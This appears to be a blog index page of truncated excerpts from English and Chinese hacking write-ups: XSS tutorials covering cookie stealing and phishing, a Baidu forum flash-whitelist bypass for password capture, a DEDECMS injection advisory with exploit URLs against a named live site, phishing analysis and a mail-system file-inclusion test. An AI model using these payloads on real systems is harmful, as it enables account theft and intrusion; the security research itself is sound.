0x50sec.org

From:http://packetstormsecurity.org/files/view/99770/ixss.txt

// Best Viewed in Notepad++ with word wrap enabled :)

A Tribute To My Mother Land

” INDIA ”
**********************************************************
We should be thankful and remember the bravery of Maharaja
Prithvi Raj Chauhan, Maharana Pratap, Chandra Shekhar Azad,
Bhagat Singh, Rajguru, Sukhdev and all those who vanished
their lives for the sake of freedom and sanctity of the
land named Hindustan (collectively India, Pakistan &
Bangladesh).

We might remember the intrepid spirit who stood an army
named “Azad Hind Fauj” from prisoners of world war II far
from India and fought for our freedom, The Great Subhash
Chandra Bose. Remember His Words of inspiration

“Tum mujhe khoon do, main tumhe azaadi doonga”

We might get inspired by their great lifestyles and follow
their thoughts.
**********************************************************

Important!… Warning!!!
The author do not take responsibility, if anyone, tries
these hacks against any organization or whatever that makes
him to trespass the security measures and brings him under
the legal prosecution. These hacks are intended for the
improvement of security and for investigations by legal
security agencies. For educational institutions it is
hereby requested that they should prevent their students
from using the tools provided in this paper against the
corporate world. This paper is the proof-of-concept and
must be treated as it is.

<|-[___________________________________________________________________________]-|>
-                                                                                     -
-                              [ Cross Site scripting  ]                              -
-                             By Ankit Anand [CrazyAnkit ]                            -
-                                                                             -
<|-[___________________________________________________ ________________________]-|>

# Written On 26 March 2011
# Author : Ankit Anand
[ koolankit1993@gmail.com , ankitthehacker.wordpress.com
# Written For Indishell.in ; Hackerz5.com ; r00tp0is0n.in
# Greetz Fly Out to :  RJ D Indian ,cyb3r_shubham , cyb3rs4m ,l0c4l r00t , LuCky , c00lt04d, reb0rn, 3thic4l n00b , darkw0lf , ne0

// Reference : Exploit-db , Aoh [Orkut] , Google ;)

–==+================================================================================+==–
–==+                     Dedicated To My Loving parents                             +==–
–==+================================================================================+==–

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
Feel Free To Share This White paper , knowledge is for sharing , But Respect Author’s Hardwork . Give Proper Credits !

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( I   ]> Introduction
0×01: Introduction
0×02: Finding The xss Vulnerable Websites
0×03: Executing Xss Commands
0×04: Bypass techniques
0×05: Damages By Xss
\_ 1.) Inject a Phishing script
\_ 2.) Iframe Phishing
\_ 3.) Redirict Phishing
\_ 4.) Cookie stealing
\_ 5.) Defacing
\_ Xss Cheat Sheet
0×06 : Fixing Xss Holes
0×07:  [The End]
|_| Conclusions

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>

阅读全文…

<|-[___________________________________________________________________________]-|>
-                                                                             -
-                          [ Advanced XSS Knowledge ]                         -
-                             written by novaca!ne                            -
-                                                                             -
<|-[___________________________________________________________________________]-|>

# Author: novaca!ne
# Date:   23.03.2010

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Contact: novacaine@no-trace.cc  °
Website: www.novacaine.biz      .
°
Artwork by: Vincenzo            .
°
Greetz fly out to:              .
°
Vincenzo, J0hn.X3r, fred777,    .
h0yt3r, Easy Laster, td0s,      °
Lorenz, Montaxx, maoshe, Palme  .
and free-hack.com               °
.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Index:                                °
–(  I  ]> Introduction               .
°
–( II  ]> What exactly is XSS ?      .
°
–( III ]> How to execute XSS commands.
°
–( IV  ]> Bypass techniques          .
°
–(  V  ]> What can we do with XSS ?  .
°
–( VI  ]> How to fix XSS leakages    .
°
–( VII ]> Cheat Sheets               .
°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°

阅读全文…

Author:rayh4c [80sec] EMail: rayh4c#80sec.com

前段时间发现了QQ、百度等一些安全问题，已补。QQ的那个比较敏感不能发了，摘几段百度的细节发发吧。

漏洞细节：

百度X吧发帖允许发送指定白名单URL的FLASH，白名单如下：

flashWhiteList:["<a href="http://www.tudou.com/v/%22,%22http://www.tudou.com/player/playlist.swf?lid=","http://6.cn/","http://player.ku6.com/refer/","http://img.ku6.com/common/V2.0.baidu.swf?vid=","http://tv.mofile.com/cn/xplayer.swf?v=","http://v.blog.sohu.com/fo/v4/","http://v.blog.sohu.com/fo/p4/","http://img.openv.tv/hd/swf/hd_player.swf?pid=","http://www.cnboo.com/flash/player.swf?ids=","http://video.pomoho.com/swf/out_player.swf?flvid=","http://video.cctv.com/flash/cctv_player.swf?VideoID=","http://misc.home.news.cn/video/swf/VideoDisplay.swf?videoSource=","http://mv.baidu.com/export/flashplayer.swf?playlist=","http://mv.baidu.com/export/flashplayer.swf?vid=","http://client.joy.cn/flvplayer/","http://player.youku.com/player.php/sid/","http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php","http://xiyou.cntv.cn/player/OTvideoplayer.swf","http://player.youku.com/player.php","http://player.video.qiyi.com/">http://www.tudou.com/v/","http://www.tudou.com/player/playlist.swf?lid=","http://6.cn/","http://player.ku6.com/refer/","http://img.ku6.com/common/V2.0.baidu.swf?vid=","http://tv.mofile.com/cn/xplayer.swf?v=","http://v.blog.sohu.com/fo/v4/","http://v.blog.sohu.com/fo/p4/","http://img.openv.tv/hd/swf/hd_player.swf?pid=","http://www.cnboo.com/flash/player.swf?ids=","http://video.pomoho.com/swf/out_player.swf?flvid=","http://video.cctv.com/flash/cctv_player.swf?VideoID=","http://misc.home.news.cn/video/swf/VideoDisplay.swf?videoSource=","http://mv.baidu.com/export/flashplayer.swf?playlist=","http://mv.baidu.com/export/flashplayer.swf?vid=","http://client.joy.cn/flvplayer/","http://player.youku.com/player.php/sid/","http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php","http://xiyou.cntv.cn/player/OTvideoplayer.swf","http://player.youku.com/player.php","http://player.video.qiyi.com/"]

黑客只需要在白名单URL中找到一个可以嵌入FLASH的漏洞，原白名单http://6.cn/的URL过于宽松，于是在http://6.cn上找到一个301，302状态的转跳URL即可嵌入任意的FLASH文件，如：

http://6.cn/logout.php?next_action=http://xxxxxx/xxxx.swf

该FLASH的功能是在当前页面嵌入一个js，同时在有关联关系的引用窗口跨页面嵌入一个js，也就是在x吧浏览过的网页都能被自动嵌入js。该JS脚本的功能是劫持用户的点击，强制用户登录，并记录用户输入的密码！
阅读全文…

DEDECMS终于要发布5.6了,期待ing…没办法下到程序,就去做了个黒盒测试,
暂时也没办法分析更多…
嗯,.
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
测试站点:http://zz.5u.cn

=============================================
| # Title    : DEDECMS V5.6 GBK SQL injection Vulnerability
| # Author   : Akira
| # email    : MCAkira@HotMail.CoM
| # Home     : [url]http://www.hackclub.net[/url]
| # Web Site : [url]http://zz.u5.cn[/url]
| #Download: [url]http://www.dedecms.com[/url]
| # Dork     : Powered By DEDECMS.COM © 2004-2010 DEDECMS Inc.
| # Tested on: Microsoft Windows XP SP2  + Lunix (debian 5.0)
| # Bug      :SQL injection ,XSS
==================== Exploit By Akira================

http://zz.5u.cn/member/index.php?uid=’%20||%20”%20||%20′%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe’”)/>

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7′”><iframe%20src=http://www.milsec.net>

网络钓鱼攻击技术分析及防范

Author: rayh4c [80sec]
EMail: rayh4c#80sec.com
Site: http://www.80sec.com
Date: 2008-12-22
From: http://www.80sec.com/release/Phishing.txt

[ 目录 ]

0×00 网络钓鱼形势分析
0×01 网络钓鱼原理分析
0×02 URL编码结合钓鱼技术
0×03 Web漏洞结合钓鱼技术
0×04 伪造Email地址结合钓鱼技术
0×05 浏览器漏洞结合钓鱼技术
0×06 如何防范网络钓鱼攻击
0×07 内容关键字匹配URL检测钓鱼攻击
0×08 后记
0×09 参考

0×00 网络钓鱼形势分析

IE7浏览器开始加入反钓鱼功能，这个功能成为浏览器安全功能的一个选项 – 仿冒网站筛选器。各类IM软件，如QQ等开始出现提示用户防止被网络钓鱼的安全信息。电子商务、门户、SNS、BLOG等大部分Web2.0热门网站,也开始公告用户防止被网络钓鱼的安全信息。
在传统的利用系统漏洞和软件漏洞进行入侵攻击的可能性越来越小的前提下，网络钓鱼已经逐渐成为黑客们趋之若鹜的攻击手段。同时无论网络相关的客户端软件还是大型的Web网站都开始发觉网络钓鱼已经成为了一个严峻的问题，并积极防御。

0×01 网络钓鱼原理分析

网络钓鱼属于社会工程学攻击的一种，简单的描叙就是通过伪造信息获得受害者的信任并且响应，由于网络信息是呈爆炸性增长的，人们面对各种各样的信息往往难以辨认真伪，依托网络环境进行钓鱼攻击是一种非常可行的攻击手段。
阅读全文…

对于iGENUS邮件系统的一次安全检测

hackerxwar/gle [0x50]

本文首发黑客防线，版权归作者和黑防所有，未经允许请勿转载。

iGENUS邮件系统是适用于Linux操作系统平台的应用广泛的一套WebMail邮件系统。使用安装程序能快速安装在CentOS Linux 3.x/4.x 操作系统、RedHat Enterprise Linux AS3/AS4操作系统上，其界面华丽，安装简单，但是却存在着严重的安全问题。

发现本地文件包含漏洞

由于是不是开源软件所以只能黑盒测试，发现登录页面存在本地文件包含漏洞,如图1所示。
看来包含的漏洞是类似于”include(‘language/’.$_GET['lang'].”_inc.php”)”,此处包含文件一般需要截断，除非我们能够控制某个’*_inc.php’文件的内容。

图1

阅读全文…

Author: jianxin [80sec]
EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2008-12-24
From: http://www.80sec.com/release/xss-how-to-root.txt

[ 目录 ]

0×00 前言
0×01 xss渗透测试基本思路
0×02 一次黑盒的xss渗透测试
0×03 一次白盒的xss渗透测试
0×04 总结

0×00 前言

在web蓬勃发展的今天，xss毫无疑问已经变成最“流行”的漏洞，我曾经在安全公司的渗透测试报告里看到列为数十的高危xss漏洞，也看到越来越 多的安 全研究人员将目标投向xss攻击，发现100个甚至1000个之上的xss。 阅读全文…